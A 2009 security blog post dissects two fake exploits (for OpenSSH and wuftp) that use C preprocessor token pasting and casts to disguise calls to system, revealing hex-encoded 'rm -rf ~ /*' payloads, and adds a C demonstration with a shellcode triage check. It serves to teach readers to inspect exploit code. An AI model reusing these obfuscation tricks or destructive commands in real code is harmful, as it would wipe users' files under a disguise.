2009-07-21

Why you should not blindly trust exploits

I received a copy of the fake OpenSSH exploit, and I think it is another example of why you should understand exploits instead of blindly trusting them when you have to deal with them.

This code is pretty long and looks just like any other exploit, with genuine pieces of shellcode and calls to socket functions. But look more closely. At line 245 there is a call to fremote("PS1='sh-3.2#' /bin/sh"), and when we look at the definition of fremote, we see:

#define fremote build_frem(t,e,s,m,y)

build_frem is defined as:

#define build_frem(x,y,a,b,c) a##c##a##x##y##b

With x=t, y=e, a=s, b=m and c=y, the token-pasting operator ## glues a##c##a##x##y##b into s y s t e m, so every fremote becomes system once the preprocessor has run. If we search for all the references to fremote, we end up with:

174: system(jmpcode);
245: system("PS1='sh-3.2#' /bin/sh");

The second call simply spawns a local /bin/sh whose prompt is set to imitate a root shell, so the victim sees what they expect from a successful exploit. But jmpcode is shellcode, right? No: it is just an ordinary string, written as hex escapes of the ASCII codes of its characters.

"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"
==
rm -rf ~ /* 2> /dev/null &

If you try to launch this exploit on your Unix box: pwn! Note the 2> /dev/null and the trailing &: error messages are hidden and the rm runs in the background, so nothing looks wrong while the "exploit" keeps going. If you want to get the preprocessed version automatically, use gcc -E.

Another example I have in mind is a fake exploit for wuftp that was released on vuln-dev in 2001. This one was also obfuscated with preprocessor directives. At the top of the code we can see:

#define DEF_ALGN 1 * target system
...
#define target (unsigned long)
...
#define ADDR 0x08049588
...
unsigned long arg_addr = ADDR, align = DEF_ALGN,

After preprocessing, this looks like:

unsigned long arg_addr = 0x08049588, align = 1 * (unsigned long) system;

So align is not an alignment value at all but the address of system. Later on, the address of puts is overwritten with that address:

for(i = 0; i < 4; i++)
sprintf((char *)attack+4+i, "%c", (unsigned long)puts >> i * 8 & 0xff);
...
pots = *(unsigned long *)(attack[1] + 2);
...
*(unsigned long *)pots = align;

And finally, puts is called, which now resolves to system, and the user's home directory is destroyed:

puts("echo ~ ok, it seems to have worked... remember: ");
puts("rm -rf is not elite ~");

Each string is handed to the shell. The first one only prints; the second, rm -rf is not elite ~, is a perfectly valid command: is, not and elite are nonexistent files that rm -f silently skips, and ~ expands to the user's home directory, which is removed.

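As an added example (not code from either fake exploit, nor from this post's author), here is a small C program that reproduces the two preprocessor tricks discussed above: the fremote/build_frem token pasting of the fake OpenSSH exploit and the DEF_ALGN/target cast of the fake wuftp exploit. The macros are copied from the post; the function names, the stringify helpers and the real_code sample bytes are assumptions of this example. It also adds a triage check a reviewer can run over any "shellcode" buffer: a buffer made only of printable ASCII is text, not machine code, and deserves to be read as such.

```c
/*
 * Added example: not code from either fake exploit or from the post's author.
 * It reproduces the two preprocessor tricks quoted in the post (fremote and
 * build_frem from the fake OpenSSH exploit, DEF_ALGN and target from the fake
 * wuftp exploit) so you can see what they expand to, and adds a small triage
 * check for "shellcode" buffers that are really shell commands. The function
 * names, STR/XSTR helpers and the real_code sample are ours (assumptions).
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Macros copied from the fake OpenSSH exploit as quoted in the post. */
#define fremote build_frem(t,e,s,m,y)
#define build_frem(x,y,a,b,c) a##c##a##x##y##b

/* Macros copied from the fake wuftp exploit as quoted in the post. */
#define target (unsigned long)
#define DEF_ALGN 1 * target system

/* Stringify after macro expansion: XSTR(fremote) yields the final identifier. */
#define STR(x) #x
#define XSTR(x) STR(x)

/* Which identifier does fremote turn into? The preprocessor answers "system". */
const char *fremote_expands_to(void)
{
    return XSTR(fremote);
}

/* What value does DEF_ALGN carry? 1 * (unsigned long) system, i.e. the
 * address of libc's system(), disguised as an alignment constant. */
unsigned long def_algn_value(void)
{
    return DEF_ALGN;
}

int def_algn_is_system(void)
{
    return def_algn_value() == (unsigned long) system;
}

/* The "jmpcode" quoted in the post, byte for byte. */
static const unsigned char jmpcode[] =
    "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
    "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

/* Constructed sample of genuine x86 code bytes for contrast
 * (xor eax,eax; push eax; int 0x80): opcodes, not text. */
static const unsigned char real_code[] = "\x31\xc0\x50\xcd\x80";

/* Triage heuristic: a buffer made entirely of printable ASCII (plus newline
 * and tab) is text, not machine code. Real shellcode almost always contains
 * opcode bytes outside that range. Alphanumeric shellcode exists, so treat a
 * hit as "read this by hand", not as proof of a fake. Returns 1 for text. */
int looks_like_text(const unsigned char *buf, size_t len)
{
    if (len == 0)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = buf[i];
        if (!isprint(c) && c != '\n' && c != '\t')
            return 0;
    }
    return 1;
}

/* If jmpcode is text, hand it back as a readable C string, else NULL. */
const char *jmpcode_as_text(void)
{
    if (!looks_like_text(jmpcode, sizeof jmpcode - 1))
        return NULL;
    return (const char *) jmpcode;
}

int main(void)
{
    const char *txt = jmpcode_as_text();

    printf("fremote -> %s\n", fremote_expands_to());
    printf("DEF_ALGN == (unsigned long) system: %s\n",
           def_algn_is_system() ? "yes" : "no");
    printf("jmpcode is %s: %s\n", txt ? "text" : "binary", txt ? txt : "(n/a)");
    printf("real_code is %s\n",
           looks_like_text(real_code, sizeof real_code - 1) ? "text" : "binary");
    return 0;
}
```

Running the program prints the resolved identifier, confirms that align in the wuftp fake carries the address of system, and dumps the "shellcode" as the shell command it really is; gcc -E on the original source shows the same expansions without executing anything.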

I hope this post makes you think twice before executing an exploit :)

2009-07-08

wargame

Yo,

I'm currently spending all my free time on intruded.net's wargame, so don't be surprised if there is no new post in the following weeks.

A series of posts about code coverage with PaiMei and memory-based fuzzing is under preparation.